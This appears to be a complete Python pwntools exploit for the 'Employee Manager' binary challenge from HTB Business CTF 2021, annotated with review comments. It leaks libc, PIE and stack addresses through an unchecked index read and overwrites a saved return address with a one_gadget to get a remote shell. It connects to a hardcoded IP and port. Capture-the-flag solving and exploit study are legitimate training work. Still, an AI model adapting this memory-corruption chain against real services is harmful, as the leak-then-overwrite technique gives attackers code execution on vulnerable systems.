'''
Exploit for the "Employee Manager" pwning challenge
HTB Business CTF 2021
DeteAct (https://pentest.global/)
'''
import re
from pwn import *
# Flip to True to work against a local copy of the service. The process()
# variant with the challenge libc preloaded is kept (commented) for gdb work.
USE_LOCAL = False
if USE_LOCAL:
    # s = process('./manager', env={'LD_PRELOAD': './libc-2.31.so'})
    s = remote('localhost', 1337)
else:
    # CTF infrastructure as of July 2021 -- this host/port is almost certainly
    # gone; point it at your own instance of the challenge.
    s = remote('142.93.35.92', 32313)

elf = ELF('./manager')

# All constants below are tied to the challenge's libc-2.31.so (see the
# LD_PRELOAD line above) and to the shipped ./manager binary; they will not
# transfer to any other glibc build.
libc_start_main = 0x26FC0
# NOTE(review): the "- 243" suggests the slot leaked as "libc start main" is
# really the saved return address *into* __libc_start_main (its +243), so the
# computed libc base is off by 243 and this constant cancels that out.
# Confirm in gdb before reusing either number.
one_gadget_offset = 0xe6c84 - 243  # wtf
main_offset = elf.symbols['main']  # 0x122f
puts_offset = elf.got['puts']      # only referenced in commented-out code below
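def _as_text(chunk):
    """Coerce a tube reply to text so the regexes below work on py2 str and py3 bytes alike."""
    if isinstance(chunk, bytes):
        return chunk.decode('latin-1')
    return str(chunk)


def leak(offset, conn=None):
    """Read one 8-byte slot as two 32-bit halves via menu option 1.

    Sends ``1`` (the "view" action) and then ``offset``, and parses the
    ``Rate: N`` / ``week: N`` numbers the service echoes back. The caller
    reassembles them as ``(Rate << 32) + week``, i.e. Rate is the high half
    and week the low half of a 64-bit value -- this is the exploit's
    arbitrary-read primitive. The index is presumably not bounds-checked by
    the server (slots 7/9/11 reach into the stack frame) -- TODO confirm
    against the binary.

    Args:
        offset: slot index sent to the service, sent verbatim as decimal.
        conn: object exposing ``send``/``recv`` (a pwntools tube or a fake);
            defaults to the module-level tube ``s`` so existing call sites
            keep working.

    Returns:
        ``(rate, week)`` as ints, i.e. ``(high32, low32)`` of the slot.

    Raises:
        ValueError: if both fields never show up in the reply (the original
            single ``recv`` failed with an opaque IndexError when the answer
            was fragmented or the service printed an error instead).
    """
    tube = s if conn is None else conn
    tube.send('1\n')
    tube.recv(4096)  # discard the prompt for the index
    tube.send('%s\n' % offset)
    reply = ''
    # The answer may arrive in several TCP segments; keep reading until both
    # fields are present, but stay bounded so a dead peer cannot spin us.
    for _ in range(8):
        chunk = tube.recv(4096)
        if not chunk:
            break
        reply += _as_text(chunk)
        rate = re.search(r'Rate: (\d+)', reply)
        week = re.search(r'week: (\d+)', reply)
        if rate and week:
            return int(rate.group(1)), int(week.group(1))
    raise ValueError('could not parse Rate/week from reply: %r' % reply)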
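def pair_to_qword(msb, lsb):
    """Reassemble the ``(Rate, week)`` pair from ``leak`` into one 64-bit value.

    ``Rate`` is the high 32 bits, ``week`` the low 32 bits.
    """
    return (msb << 32) + lsb


def qword_to_pair(value):
    """Inverse of ``pair_to_qword``: split a 64-bit value into ``(low32, high32)``.

    Low half first, because the write primitive asks for the low word before
    the high word.
    """
    return value & 0xffffffff, value >> 32


def run_exploit():
    """Leak libc, PIE and a stack address, then overwrite slot 7 with a one_gadget.

    Uses the module-level tube ``s``, the ``leak`` read primitive and the
    offsets defined at the top of the file. Written for Python 2 / the
    pwntools of the day (``raw_input``, str sends).
    """
    s.recv(4096)  # swallow the banner / first menu

    # LEAK LIBC: slot 7 holds a pointer into __libc_start_main. Note that
    # one_gadget_offset already carries a -243 correction, which hints that
    # this is the return address at __libc_start_main+243 rather than the
    # function itself -- the printed "LIBC" value may therefore be base+243.
    msb, lsb = leak(7)
    libc_offset = pair_to_qword(msb, lsb) - libc_start_main
    print('LIBC: 0x%x' % libc_offset)
    one_gadget = libc_offset + one_gadget_offset
    print('1gadget: 0x%x' % one_gadget)

    # LEAK PIE: slot 11 holds the address of main.
    msb, lsb = leak(11)
    main_addr = pair_to_qword(msb, lsb)
    print('main: 0x%x' % main_addr)
    pie_offset = main_addr - main_offset
    print('PIE: 0x%x' % pie_offset)

    # LEAK RSP: slot 9 holds some stack value; the 0x128 delta was observed
    # in gdb. The result is only printed: the stack-relative write target
    # (see the commented-out `where` computation below) was abandoned in
    # favour of the fixed slot 7.
    msb, lsb = leak(9)
    stack = pair_to_qword(msb, lsb) - 0x128
    print('Stack: 0x%x' % stack)

    # WRITE (menu option 2): overwrite slot 7 -- the very slot the libc leak
    # came from, presumably main's saved return address -- with the
    # one_gadget, so returning from main lands in the gadget.
    s.send('2\n')
    s.recv(4096)
    # puts = pie_offset + puts_offset
    # print('puts: 0x%x' % puts)
    # where = (puts - stack) // 2
    where = 7  # libc start main
    s.send('%s\n' % where)
    s.recv(4096)
    what_lsb, what_msb = qword_to_pair(one_gadget)
    raw_input('PWN???')  # pause to attach gdb before the write lands
    s.send('%s\n' % what_lsb)
    s.recv(4096)
    s.send('%s\n' % what_msb)
    # No recv between the high word and exit: the service presumably prints
    # nothing after the second half, and option 3 (exit) is what triggers the
    # return through the overwritten slot.
    s.send('3\n')  # exit
    s.interactive()


if __name__ == '__main__':
    run_exploit()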